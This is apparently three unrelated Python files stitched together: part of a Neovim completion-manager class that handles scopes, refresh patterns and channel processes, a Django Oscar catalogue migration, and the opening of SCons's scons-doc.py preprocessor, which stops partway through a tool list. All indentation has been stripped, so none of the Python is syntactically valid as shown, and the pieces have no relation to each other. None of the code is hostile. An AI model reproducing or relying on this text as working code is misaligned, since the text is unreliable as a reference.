def _get_ctx_list(self,root_ctx):
ctx_list = [root_ctx,]
# scoping
i = 0
while i<len(ctx_list):
ctx = ctx_list[i]
scope = ctx['scope']
if scope in self._subscope_detectors:
for detector in self._subscope_detectors[scope]:
try:
sub_ctx = detector.sub_context(ctx, self.get_src(ctx))
if sub_ctx:
                            # adjust offsets to be global-based and add the new
                            # context
sub_ctx['scope_offset'] += ctx.get('scope_offset',0)
sub_ctx['scope_lnum'] += ctx.get('scope_lnum',1)-1
if int(sub_ctx['lnum']) == 1:
sub_ctx['typed'] = sub_ctx['typed'][sub_ctx['scope_col']-1:]
sub_ctx['scope_col'] += ctx.get('scope_col',1)-1
logger.info('adjusting scope_col')
ctx_list.append(sub_ctx)
logger.info('new sub context: %s', sub_ctx)
except Exception as ex:
logger.exception("exception on scope processing: %s", ex)
i += 1
return ctx_list
def _check_refresh_patterns(self,info,ctx,force=False):
# Concept of ctx['match_end']:
# for cm_refresh_pattern `\/`, and word pattern `[a-z/]`
# foo/bar gets `foo/`
# foo/bar/baz gets `foo/bar/`
        # It is useful for triggering cm_refresh in the middle of a word
patterns = info.get('cm_refresh_patterns',None)
typed = ctx['typed']
word_pattern = info.get('word_pattern', None) or cm_default.word_pattern(ctx)
# remove the last word, check whether the special pattern matches
# word_removed
end_word_matched = re.search(word_pattern + "$",typed)
if end_word_matched:
ctx['base'] = end_word_matched.group()
ctx['startcol'] = ctx['col'] - len(ctx['base'].encode('utf-8'))
word_removed = typed[:end_word_matched.start()]
word_len = len(ctx['base'])
else:
ctx['base'] = ''
ctx['startcol'] = ctx['col']
word_removed = typed
word_len = 0
ctx['match_end'] = len(word_removed)
# check source extra patterns
if patterns:
for pattern in patterns:
                # use a greedy '.*' prefix to push the match to the last
                # occurrence of the pattern
if not pattern.startswith("^"):
pattern = '.*' + pattern
matched = re.search(pattern, typed)
if matched and matched.end() >= len(typed)-word_len:
ctx['match_end'] = matched.end()
return True
min_len = info['cm_refresh_length']
# always match
if min_len==0:
return True
if force and word_len>0:
return True
if min_len > 0 and word_len >= min_len:
return True
return False
# almost the same as `s:check_scope` in `autoload/cm.vim`
def _check_scope(self,ctx,info):
scopes = info.get('scopes',None)
cur_scope = ctx.get('scope',ctx['filetype'])
is_root_scope = ( cur_scope==ctx['filetype'] )
ctx['scope_match'] = ''
if not scopes:
            # the scopes setting is None, which means this is a general-purpose
            # completion source; only complete for the root scope
if is_root_scope:
return True
else:
return False
for scope in scopes:
if scope==cur_scope:
ctx['scope_match'] = scope
if info.get('scoping',False):
return True
else:
return is_root_scope
return False
def _refresh_completions(self,ctx):
"""
        Note: This function is called via a greenlet coroutine. Be careful to
        avoid blocking requests.
"""
matches = []
# sort by priority
names = sorted(self._matches.keys(),key=lambda x: self._sources[x]['priority'], reverse=True)
if len(names)==0:
# empty
logger.info('_refresh_completions names: %s, startcol: %s, matches: %s', names, ctx['col'], [])
self._complete(ctx, ctx['col'], [])
return
col = ctx['col']
startcol = col
        # basic processing per source
for name in names:
try:
self._matches[name]['last_matches'] = []
# may be disabled due to early_cache
if not self._matches[name].get('enable',True):
logger.debug('<%s> ignore by disabled', name)
continue
source_startcol = self._matches[name]['startcol']
if source_startcol>col or source_startcol==0:
self._matches[name]['last_matches'] = []
logger.error('ignoring invalid startcol for %s %s', name, self._matches[name]['startcol'])
continue
source_matches = self._matches[name]['matches']
source_matches = self.process_matches(name,ctx,source_startcol,source_matches)
self._matches[name]['last_matches'] = source_matches
if not source_matches:
continue
                # use the smallest source_startcol among non-empty
                # source_matches as the overall startcol
if source_startcol < startcol:
startcol = source_startcol
except Exception as inst:
logger.exception('_refresh_completions process exception: %s', inst)
continue
# merge results of sources
for name in names:
try:
source_startcol = self._matches[name]['startcol']
source_matches = self._matches[name]['last_matches']
if not source_matches:
continue
prefix = ctx['typed'][startcol-1 : source_startcol-1]
for e in source_matches:
# do the padding in vimscript to avoid the rpc
# overhead of calling strdisplaywidth
e['padding'] = prefix
if 'abbr' not in e:
e['abbr'] = e['word']
e['snippet_word'] = e['word']
e['word'] = prefix + e['word']
matches += source_matches
except Exception as inst:
logger.exception('_refresh_completions process exception: %s', inst)
continue
if not matches:
startcol=len(ctx['typed']) or 1
logger.info('_refresh_completions names: %s, startcol: %s, matches cnt: %s', names, startcol, len(matches))
logger.debug('_refresh_completions names: %s, startcol: %s, matches: %s, source matches: %s', names, startcol, matches, self._matches)
self._complete(ctx, startcol, matches)
def process_matches(self,name,ctx,startcol,matches):
info = self._sources[name]
abbr = info.get('abbreviation','')
        # normalize the match data structure
formalized = []
for item in matches:
e = {}
if type(item)==type(''):
e['word'] = item
else:
e = copy.deepcopy(item)
e['icase'] = 1
formalized.append(e)
# filtering and sorting
result = self.matcher.process(info,ctx,startcol,formalized)
# fix some text
for e in result:
if 'menu' not in e:
if 'info' in e and e['info'] and len(e['info'])<50:
if abbr:
e['menu'] = "<%s> %s" % (abbr,e['info'])
else:
e['menu'] = e['info']
else:
# info too long
if abbr:
e['menu'] = "<%s>" % abbr
else:
# e['menu'] = "<%s> %s" % (self._sources[name]['abbreviation'], e['info'])
pass
return result
def _complete(self, ctx, startcol, matches):
if not matches and not self._last_matches:
# no need to fire complete message
logger.info('matches==0, _last_matches==0, ignore')
return
not_changed = 0
if self._last_startcol==startcol and self._last_matches==matches:
not_changed = 1
logger.info('ignore _complete call: self._last_startcol==startcol and self._last_matches==matches')
        # Note: The snippet field will not be kept in v:completed_item. Use
        # this trick to work around that.
snippets = []
has_snippets = False
if self._completed_snippet_enable:
for m in matches:
if not m.get('snippet', None) and not m.get('is_snippet', None):
continue
has_snippets = True
snippet = m.get('snippet', '')
if 'info' not in m or not m['info']:
m['info'] = 'snippet@%s' % len(snippets)
else:
m['info'] += '\nsnippet@%s' % len(snippets)
# snippet word should not contain spaces
rp = m['snippet_word'].split(' ')[0]
m['word'] = m['word'][:-len(m['snippet_word'])] + rp
m['snippet_word'] = rp
snippets.append(dict(snippet=snippet, word=m['snippet_word']))
if has_snippets:
for m in matches:
if 'menu' not in m:
m['menu'] = ''
if m.get('snippet', None) or m.get('is_snippet', None):
# [+] sign indicates that this completion item is
# expandable
m['menu'] = '[+] ' + m['menu']
else:
m['menu'] = '[ ] ' + m['menu']
self.nvim.call('cm#_core_complete', ctx, startcol, matches, not_changed, snippets)
self._last_matches = matches
self._last_startcol = startcol
def _start_channel(self,info):
if 'channel' not in info:
logger.error("this source does not use channel: %s", info)
return
name = info['name']
channel = info['channel']
channel_type = channel.get('type','')
py = ''
if channel_type=='python3':
py = self._py3
elif channel_type=='python2':
py = self._py2
else:
logger.info("Unsupported channel_type [%s]",channel_type)
if name not in self._channel_processes:
self._channel_processes[name] = {}
if name not in self._channel_threads:
self._channel_threads[name] = {}
process_info = self._channel_processes[name]
thread_info = self._channel_threads[name]
# channel process already started
if 'proc' in process_info or 'thread' in thread_info:
return
if self._multi_thread and channel_type=='python3' and channel.get('multi_thread',1) and sys.version_info.major>=3:
logger.info("starting <%s> thread channel", name)
thread_info['thread'] = threading.Thread(
target=cm.start_and_run_channel,
name=name,
args=('channel', self._servername, name, channel['module'])
)
thread_info['thread'].start()
return
cmd = [py, self._start_py, 'channel', name, channel['module'], self._servername]
# has not been started yet, start it now
logger.info('starting channels for %s: %s',name, cmd)
proc = subprocess.Popen(cmd,stdin=subprocess.DEVNULL,stdout=sys.stdout,stderr=sys.stderr)
process_info['pid'] = proc.pid
process_info['proc'] = proc
logger.info('source <%s> channel pid: %s', name, proc.pid)
def cm_shutdown(self):
# wait for channel-threads' exit
for name in self._channel_threads:
tinfo = self._channel_threads[name]
if 'thread' not in tinfo:
continue
try:
logger.info("join <%s> thread", name)
tinfo['thread'].join(2)
logger.info("success join <%s> thread", name)
except Exception as ex:
logger.exception("timeout join <%s> thread", name)
# wait for normal exit
time.sleep(1)
procs = []
for name in self._channel_processes:
pinfo = self._channel_processes[name]
if 'proc' not in pinfo:
continue
proc = pinfo['proc']
try:
if proc.poll() is not None:
logger.info("channel %s already terminated", name)
continue
procs.append((name,proc))
logger.info("terminating channel %s", name)
proc.terminate()
except Exception as ex:
logger.exception("send terminate signal failed for %s", name)
if not procs:
return
        # wait for processes to terminate
time.sleep(1)
# kill all
for name,proc in procs:
try:
if proc.poll() is not None:
logger.info("channel %s has terminated", name)
continue
logger.info("killing channel %s", name)
proc.kill()
logger.info("hannel %s killed", name)
except Exception as ex:
logger.exception("send kill signal failed for %s", name)
def cm_start_channels(self,srcs,ctx):
names = sorted(srcs.keys(),key=lambda n: srcs[n]['priority'], reverse=True)
for name in names:
info = srcs[name]
if not info['enable']:
continue
# this source is not using channel
if 'channel' not in info:
continue
# channel already started
if info['channel'].get('id',None):
continue
if not self._check_scope(ctx,info):
continue
self._start_channel(info)
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import oscar.models.fields.autoslugfield
import django.db.models.deletion
import django.core.validators
import oscar.models.fields
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AttributeOption',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('option', models.CharField(max_length=255, verbose_name='Option')),
],
options={
'verbose_name_plural': 'Attribute options',
'verbose_name': 'Attribute option',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='AttributeOptionGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
],
options={
'verbose_name_plural': 'Attribute option groups',
'verbose_name': 'Attribute option group',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.CharField(unique=True, max_length=255)),
('depth', models.PositiveIntegerField()),
('numchild', models.PositiveIntegerField(default=0)),
('name', models.CharField(max_length=255, db_index=True, verbose_name='Name')),
('description', models.TextField(verbose_name='Description', blank=True)),
('image', models.ImageField(upload_to='categories', verbose_name='Image', max_length=255, blank=True, null=True)),
('slug', models.SlugField(max_length=255, editable=False, verbose_name='Slug')),
('full_name', models.CharField(max_length=255, editable=False, db_index=True, verbose_name='Full Name')),
],
options={
'ordering': ['full_name'],
'verbose_name_plural': 'Categories',
'verbose_name': 'Category',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('code', oscar.models.fields.autoslugfield.AutoSlugField(populate_from='name', unique=True, verbose_name='Code', max_length=128, editable=False, blank=True)),
('type', models.CharField(default='Required', max_length=128, verbose_name='Status', choices=[('Required', 'Required - a value for this option must be specified'), ('Optional', 'Optional - a value for this option can be omitted')])),
],
options={
'verbose_name_plural': 'Options',
'verbose_name': 'Option',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('structure', models.CharField(default='standalone', max_length=10, verbose_name='Product structure', choices=[('standalone', 'Stand-alone product'), ('parent', 'Parent product'), ('child', 'Child product')])),
('upc', oscar.models.fields.NullCharField(unique=True, verbose_name='UPC', max_length=64, help_text='Universal Product Code (UPC) is an identifier for a product which is not specific to a particular supplier. Eg an ISBN for a book.')),
('title', models.CharField(max_length=255, verbose_name='Title', blank=True)),
('slug', models.SlugField(max_length=255, verbose_name='Slug')),
('description', models.TextField(verbose_name='Description', blank=True)),
('rating', models.FloatField(editable=False, verbose_name='Rating', null=True)),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),
('date_updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date updated')),
('is_discountable', models.BooleanField(default=True, verbose_name='Is discountable?', help_text='This flag indicates if this product can be used in an offer or not')),
],
options={
'ordering': ['-date_created'],
'verbose_name_plural': 'Products',
'verbose_name': 'Product',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('code', models.SlugField(max_length=128, verbose_name='Code', validators=[django.core.validators.RegexValidator(regex='^[a-zA-Z\\-_][0-9a-zA-Z\\-_]*$', message="Code can only contain the letters a-z, A-Z, digits, minus and underscores, and can't start with a digit")])),
('type', models.CharField(default='text', max_length=20, verbose_name='Type', choices=[('text', 'Text'), ('integer', 'Integer'), ('boolean', 'True / False'), ('float', 'Float'), ('richtext', 'Rich Text'), ('date', 'Date'), ('option', 'Option'), ('entity', 'Entity'), ('file', 'File'), ('image', 'Image')])),
('required', models.BooleanField(default=False, verbose_name='Required')),
('option_group', models.ForeignKey(null=True, verbose_name='Option Group', help_text='Select an option group if using type "Option"', to='catalogue.AttributeOptionGroup', blank=True, on_delete=models.CASCADE)),
],
options={
'ordering': ['code'],
'verbose_name_plural': 'Product attributes',
'verbose_name': 'Product attribute',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductAttributeValue',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_text', models.TextField(blank=True, verbose_name='Text', null=True)),
('value_integer', models.IntegerField(blank=True, verbose_name='Integer', null=True)),
('value_boolean', models.NullBooleanField(verbose_name='Boolean')),
('value_float', models.FloatField(blank=True, verbose_name='Float', null=True)),
('value_richtext', models.TextField(blank=True, verbose_name='Richtext', null=True)),
('value_date', models.DateField(blank=True, verbose_name='Date', null=True)),
('value_file', models.FileField(upload_to='images/products/%Y/%m/', max_length=255, blank=True, null=True)),
('value_image', models.ImageField(upload_to='images/products/%Y/%m/', max_length=255, blank=True, null=True)),
('entity_object_id', models.PositiveIntegerField(blank=True, editable=False, null=True)),
('attribute', models.ForeignKey(verbose_name='Attribute', to='catalogue.ProductAttribute', on_delete=models.CASCADE)),
('entity_content_type', models.ForeignKey(null=True, editable=False, to='contenttypes.ContentType', blank=True, on_delete=models.CASCADE)),
('product', models.ForeignKey(verbose_name='Product', related_name='attribute_values', to='catalogue.Product', on_delete=models.CASCADE)),
('value_option', models.ForeignKey(null=True, verbose_name='Value option', to='catalogue.AttributeOption', blank=True, on_delete=models.CASCADE)),
],
options={
'verbose_name_plural': 'Product attribute values',
'verbose_name': 'Product attribute value',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(verbose_name='Category', to='catalogue.Category', on_delete=models.CASCADE)),
('product', models.ForeignKey(verbose_name='Product', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['product', 'category'],
'verbose_name_plural': 'Product categories',
'verbose_name': 'Product category',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('slug', oscar.models.fields.autoslugfield.AutoSlugField(populate_from='name', unique=True, verbose_name='Slug', max_length=128, editable=False, blank=True)),
('requires_shipping', models.BooleanField(default=True, verbose_name='Requires shipping?')),
('track_stock', models.BooleanField(default=True, verbose_name='Track stock levels?')),
('options', models.ManyToManyField(verbose_name='Options', to='catalogue.Option', blank=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Product classes',
'verbose_name': 'Product class',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original', models.ImageField(upload_to='images/products/%Y/%m/', max_length=255, verbose_name='Original')),
('caption', models.CharField(max_length=200, verbose_name='Caption', blank=True)),
('display_order', models.PositiveIntegerField(default=0, verbose_name='Display order', help_text='An image with a display order of zero will be the primary image for a product')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),
('product', models.ForeignKey(verbose_name='Product', related_name='images', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['display_order'],
'verbose_name_plural': 'Product images',
'verbose_name': 'Product image',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductRecommendation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ranking', models.PositiveSmallIntegerField(default=0, verbose_name='Ranking', help_text='Determines order of the products. A product with a higher value will appear before one with a lower ranking.')),
('primary', models.ForeignKey(verbose_name='Primary product', related_name='primary_recommendations', to='catalogue.Product', on_delete=models.CASCADE)),
('recommendation', models.ForeignKey(verbose_name='Recommended product', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['primary', '-ranking'],
'verbose_name_plural': 'Product recomendations',
'verbose_name': 'Product recommendation',
'abstract': False,
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='productrecommendation',
unique_together=set([('primary', 'recommendation')]),
),
migrations.AlterUniqueTogether(
name='productimage',
unique_together=set([('product', 'display_order')]),
),
migrations.AlterUniqueTogether(
name='productcategory',
unique_together=set([('product', 'category')]),
),
migrations.AlterUniqueTogether(
name='productattributevalue',
unique_together=set([('attribute', 'product')]),
),
migrations.AddField(
model_name='productattribute',
name='product_class',
field=models.ForeignKey(null=True, verbose_name='Product type', related_name='attributes', to='catalogue.ProductClass', blank=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='attributes',
field=models.ManyToManyField(verbose_name='Attributes', help_text='A product attribute is something that this product may have, such as a size, as specified by its class', to='catalogue.ProductAttribute', through='catalogue.ProductAttributeValue'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='categories',
field=models.ManyToManyField(through='catalogue.ProductCategory', verbose_name='Categories', to='catalogue.Category'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='parent',
field=models.ForeignKey(null=True, verbose_name='Parent product', related_name='children', help_text="Only choose a parent product if you're creating a child product. For example if this is a size 4 of a particular t-shirt. Leave blank if this is a stand-alone product (i.e. there is only one version of this product).", to='catalogue.Product', blank=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='product_class',
field=models.ForeignKey(verbose_name='Product type', on_delete=django.db.models.deletion.PROTECT, related_name='products', help_text='Choose what type of product this is', to='catalogue.ProductClass', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='product_options',
field=models.ManyToManyField(verbose_name='Product options', help_text="Options are values that can be associated with a item when it is added to a customer's basket. This could be something like a personalised message to be printed on a T-shirt.", to='catalogue.Option', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='recommended_products',
field=models.ManyToManyField(verbose_name='Recommended products', help_text='These are products that are recommended to accompany the main product.', to='catalogue.Product', through='catalogue.ProductRecommendation', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='attributeoption',
name='group',
field=models.ForeignKey(verbose_name='Group', related_name='options', to='catalogue.AttributeOptionGroup', on_delete=models.CASCADE),
preserve_default=True,
),
]
|
|
#!/usr/bin/env python
#
# Copyright (c) 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# scons-doc.py - an SGML preprocessor for capturing SCons output
# and inserting it into examples in our DocBook
# documentation
#
# Synopsis:
#
# scons-doc [OPTIONS] [.in files]
#
# When no input files are given, the folder doc/user/* is searched for .in files.
#
# Available options:
#
# -d, --diff create examples for the .in file and output a unified
# diff against the related .xml file
# -r, --run create examples for the .in file, but do not change
# any files
# -s, --simple_diff use a simpler output for the diff mode (no unified
# diff!)
# -u, --update create examples for the .in file and update the
# related .xml file
#
# This script looks for some SGML tags that describe SCons example
# configurations and commands to execute in those configurations, and
# uses TestCmd.py to execute the commands and insert the output from
# those commands into the SGML that we output. This way, we can run a
# script and update all of our example documentation output without
# a lot of laborious by-hand checking.
#
# An "SCons example" looks like this, and essentially describes a set of
# input files (program source files as well as SConscript files):
#
# <scons_example name="ex1">
# <file name="SConstruct" printme="1">
# env = Environment()
# env.Program('foo')
# </file>
# <file name="foo.c">
# int main() { printf("foo.c\n"); }
# </file>
# </scons_example>
#
# The <file> contents within the <scons_example> tag will get written
# into a temporary directory whenever example output needs to be
# generated. By default, the <file> contents are not inserted into text
# directly, unless you set the "printme" attribute on one or more files,
# in which case they will get inserted within a <programlisting> tag.
# This makes it easy to define the example at the appropriate
# point in the text where you intend to show the SConstruct file.
#
# Note that you should usually give the <scons_example> a "name"
# attribute so that you can refer to the example configuration later to
# run SCons and generate output.
#
# If you just want to show a file's contents without worrying about running
# SCons, there's a shorter <sconstruct> tag:
#
# <sconstruct>
# env = Environment()
# env.Program('foo')
# </sconstruct>
#
# This is essentially equivalent to <scons_example><file printme="1">,
# but it's more straightforward.
#
# SCons output is generated from the following sort of tag:
#
# <scons_output example="ex1" os="posix">
# <scons_output_command>scons -Q foo</scons_output_command>
# <scons_output_command>scons -Q foo</scons_output_command>
# </scons_output>
#
# You tell it which example to use with the "example" attribute, and then
# give it a list of <scons_output_command> tags to execute. You can also
# supply an "os" tag, which specifies the type of operating system this
# example is intended to show; if you omit this, the default value is "posix".
#
# The generated SGML will show the command line (with the appropriate
# command-line prompt for the operating system), execute the command in
# a temporary directory with the example files, capture the standard
# output from SCons, and insert it into the text as appropriate.
# Error output gets passed through to your error output so you
# can see if there are any problems executing the command.
#
import optparse
import os
import re
import sgmllib
import sys
import time
import glob
sys.path.append(os.path.join(os.getcwd(), 'QMTest'))
sys.path.append(os.path.join(os.getcwd(), 'build', 'QMTest'))
scons_py = os.path.join('bootstrap', 'src', 'script', 'scons.py')
if not os.path.exists(scons_py):
scons_py = os.path.join('src', 'script', 'scons.py')
scons_lib_dir = os.path.join(os.getcwd(), 'bootstrap', 'src', 'engine')
if not os.path.exists(scons_lib_dir):
scons_lib_dir = os.path.join(os.getcwd(), 'src', 'engine')
os.environ['SCONS_LIB_DIR'] = scons_lib_dir
import TestCmd
# The regular expression that identifies entity references in the
# standard sgmllib omits the underscore from the legal characters.
# Override it with our own regular expression that adds underscore.
sgmllib.entityref = re.compile('&([a-zA-Z][-_.a-zA-Z0-9]*)[^-_a-zA-Z0-9]')
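# For example, a (hypothetical) reference such as "&foo_bar;" is now matched in
# full as the entity "foo_bar", whereas the stock pattern would stop at "foo".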
# Classes for collecting different types of data we're interested in.
class DataCollector(object):
"""Generic class for collecting data between a start tag and end
tag. We subclass for various types of tags we care about."""
def __init__(self):
self.data = ""
def afunc(self, data):
self.data = self.data + data
class Example(DataCollector):
"""An SCons example. This is essentially a list of files that
will get written to a temporary directory to collect output
from one or more SCons runs."""
def __init__(self):
DataCollector.__init__(self)
self.files = []
self.dirs = []
class File(DataCollector):
"""A file, that will get written out to a temporary directory
for one or more SCons runs."""
def __init__(self, name):
DataCollector.__init__(self)
self.name = name
class Directory(DataCollector):
"""A directory, that will get created in a temporary directory
for one or more SCons runs."""
def __init__(self, name):
DataCollector.__init__(self)
self.name = name
class Output(DataCollector):
"""Where the command output goes. This is essentially
a list of commands that will get executed."""
def __init__(self):
DataCollector.__init__(self)
self.commandlist = []
class Command(DataCollector):
"""A tag for where the command output goes. This is essentially
a list of commands that will get executed."""
def __init__(self):
DataCollector.__init__(self)
self.output = None
Prompt = {
'posix' : '% ',
'win32' : 'C:\\>'
}
# The magick SCons hackery that makes this work.
#
# So that our examples can still use the default SConstruct file, we
# actually feed the following into SCons via stdin and then have it
# SConscript() the SConstruct file. This stdin wrapper creates a set
# of ToolSurrogates for the tools for the appropriate platform. These
# Surrogates print output like the real tools and behave like them
# without actually having to be on the right platform or have the right
# tool installed.
#
# The upshot: The wrapper transparently changes the world out from
# under the top-level SConstruct file in an example just so we can get
# the command output.
Stdin = """\
import os
import re
import SCons.Action
import SCons.Defaults
import SCons.Node.FS
platform = '%(osname)s'
Sep = {
'posix' : '/',
'win32' : '\\\\',
}[platform]
# Slip our own __str__() method into the EntryProxy class used to expand
# $TARGET{S} and $SOURCE{S} to translate the path-name separators from
# what's appropriate for the system we're running on to what's appropriate
# for the example system.
orig = SCons.Node.FS.EntryProxy
class MyEntryProxy(orig):
def __str__(self):
return str(self._subject).replace(os.sep, Sep)
SCons.Node.FS.EntryProxy = MyEntryProxy
# Slip our own RDirs() method into the Node.FS.File class so that the
# expansions of $_{CPPINC,F77INC,LIBDIR}FLAGS will have the path-name
# separators translated from what's appropriate for the system we're
# running on to what's appropriate for the example system.
orig_RDirs = SCons.Node.FS.File.RDirs
def my_RDirs(self, pathlist, orig_RDirs=orig_RDirs):
return [str(x).replace(os.sep, Sep) for x in orig_RDirs(self, pathlist)]
SCons.Node.FS.File.RDirs = my_RDirs
class Curry(object):
def __init__(self, fun, *args, **kwargs):
self.fun = fun
self.pending = args[:]
self.kwargs = kwargs.copy()
def __call__(self, *args, **kwargs):
if kwargs and self.kwargs:
kw = self.kwargs.copy()
kw.update(kwargs)
else:
kw = kwargs or self.kwargs
return self.fun(*self.pending + args, **kw)
def Str(target, source, env, cmd=""):
result = []
for cmd in env.subst_list(cmd, target=target, source=source):
result.append(' '.join(map(str, cmd)))
return '\\n'.join(result)
class ToolSurrogate(object):
def __init__(self, tool, variable, func, varlist):
self.tool = tool
if not isinstance(variable, list):
variable = [variable]
self.variable = variable
self.func = func
self.varlist = varlist
def __call__(self, env):
t = Tool(self.tool)
t.generate(env)
for v in self.variable:
orig = env[v]
try:
strfunction = orig.strfunction
except AttributeError:
strfunction = Curry(Str, cmd=orig)
# Don't call Action() through its global function name, because
# that leads to infinite recursion in trying to initialize the
# Default Environment.
env[v] = SCons.Action.Action(self.func,
strfunction=strfunction,
varlist=self.varlist)
def __repr__(self):
# This is for the benefit of printing the 'TOOLS'
# variable through env.Dump().
return repr(self.tool)
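# Illustrative example, mirroring the ToolList entries below:
#   ToolSurrogate('cc', ['CCCOM', 'SHCCCOM'], CCCom, ['CCFLAGS', 'CPPDEFINES'])
# generates the real 'cc' tool and then rebinds env['CCCOM'] and
# env['SHCCCOM'] to an Action wrapping CCCom, so the original command line
# is still printed but no real compiler is ever invoked.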
def Null(target, source, env):
pass
def Cat(target, source, env):
target = str(target[0])
f = open(target, "wb")
for src in map(str, source):
f.write(open(src, "rb").read())
f.close()
def CCCom(target, source, env):
target = str(target[0])
fp = open(target, "wb")
def process(source_file, fp=fp):
for line in open(source_file, "rb").readlines():
m = re.match(r'#include\s[<"]([^<"]+)[>"]', line)
if m:
include = m.group(1)
for d in [str(env.Dir('$CPPPATH')), '.']:
f = os.path.join(d, include)
if os.path.exists(f):
process(f)
break
elif line[:11] != "STRIP CCCOM":
fp.write(line)
for src in map(str, source):
process(src)
fp.write('debug = ' + ARGUMENTS.get('debug', '0') + '\\n')
fp.close()
public_class_re = re.compile('^public class (\S+)', re.MULTILINE)
def JavaCCom(target, source, env):
# This is a fake Java compiler that just looks for
# public class FooBar
# lines in the source file(s) and spits those out
# to .class files named after the class.
tlist = list(map(str, target))
not_copied = {}
for t in tlist:
not_copied[t] = 1
for src in map(str, source):
contents = open(src, "rb").read()
classes = public_class_re.findall(contents)
for c in classes:
for t in [x for x in tlist if x.find(c) != -1]:
open(t, "wb").write(contents)
del not_copied[t]
for t in not_copied.keys():
open(t, "wb").write("\\n")
def JavaHCom(target, source, env):
tlist = map(str, target)
slist = map(str, source)
for t, s in zip(tlist, slist):
open(t, "wb").write(open(s, "rb").read())
def JarCom(target, source, env):
target = str(target[0])
class_files = []
for src in map(str, source):
for dirpath, dirnames, filenames in os.walk(src):
class_files.extend([ os.path.join(dirpath, f)
for f in filenames if f.endswith('.class') ])
f = open(target, "wb")
for cf in class_files:
f.write(open(cf, "rb").read())
f.close()
# XXX Adding COLOR, COLORS and PACKAGE to the 'cc' varlist(s) by hand
# here is bogus. It's for the benefit of doc/user/command-line.in, which
# uses examples that want to rebuild based on changes to these variables.
# It would be better to figure out a way to do it based on the content of
# the generated command-line, or else find a way to let the example markup
# language in doc/user/command-line.in tell this script what variables to
# add, but that's more difficult than I want to figure out how to do right
# now, so let's just use the simple brute force approach for the moment.
ToolList = {
'posix' : [('cc', ['CCCOM', 'SHCCCOM'], CCCom, ['CCFLAGS', 'CPPDEFINES', 'COLOR', 'COLORS', 'PACKAGE']),
('link', ['LINKCOM', 'SHLINKCOM'], Cat, []),
('ar', ['ARCOM', 'RANLIBCOM'], Cat, []),
('tar', 'TARCOM', Null, []),
('zip', 'ZIPCOM', Null, []),
('BitKeeper', 'BITKEEPERCOM', Cat, []),
('CVS', 'CVSCOM', Cat, []),
('RCS', 'RCS_COCOM', Cat, []),
('SCCS', 'SCCSCOM', Cat, []),
